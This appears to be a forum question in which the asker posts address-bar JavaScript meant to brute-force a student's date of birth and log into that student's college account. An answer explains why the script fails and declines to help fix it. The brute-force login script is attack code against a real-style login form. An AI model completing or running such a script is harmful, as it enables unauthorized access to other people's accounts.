# JavaScript code not working in browser address bar

Tags: javascript, forms, browser

Assume there's a webpage with a form, that asks for a register number and DOB to log in. For a given register Number, I'm trying to brute force DOB using javascript to log into the user account.

I first open the webpage in a new tab.. I then enter the following JS code into the address bar. If RegNo and DOB matches, I'll be redirected to `http://blahtestblah.edu/usermanager/home.jsp`. I don't understand whats the problem with this piece of code.
Also, I'm pretty sure the year is 93 :) So, kindly help me out!

```
javascript:function f()
 {
 var day=new Array();
 var month=new Array();
 day[0]="01";
 day[1]="02";
day[2]="03";
day[3]="04";
day[4]="05";
day[5]="06";
day[6]="07";
day[7]="08";
day[8]="09";
for (var i=9;i<31;i++)
{
day[i]=i+1;
}

month[0]="01";
month[1]="02";
month[2]="03";
month[3]="04";
month[4]="05";
month[5]="06";
month[6]="07";
month[7]="08";
month[8]="09";
month[9]="10";
month[10]="11";
month[11]="12";


for(var j=0;j<31;j++)
{
for(var k=0;k<12;k++)
{
document.forms[0]['txtRegNumber'].value='112233445';
document.forms[0]['txtPwd'].value=day[j]+month[k]+'1993';
document.getElementById("frm1").elements[5].click();
if(document.location.href=="http://blahtestblah.edu/usermanager/home.jsp"){
alert(day[j]+month[k]);}

}
}

};

f();
```

Edit : DOB is of the form `ddmmyyyy`
Yeah I'm from India (:

Comment: I don't believe there's an honest intention behind this post.

Comment: Well, I'm given a chance to manage my college user accounts. Do you believe this? :)

Answer (score 1):

> I don't understand whats the problem with this piece of code.

It doesn't work because the `click` submits the form, your browser unloads the page and any executing script will vanish. It just doesn't get after that line, you will never be allowed to construct a script that will keep executing on other pages.

Since brute-forcing login forms is nothing I can support, the solution to this problem is left as an exercise to the reader :-)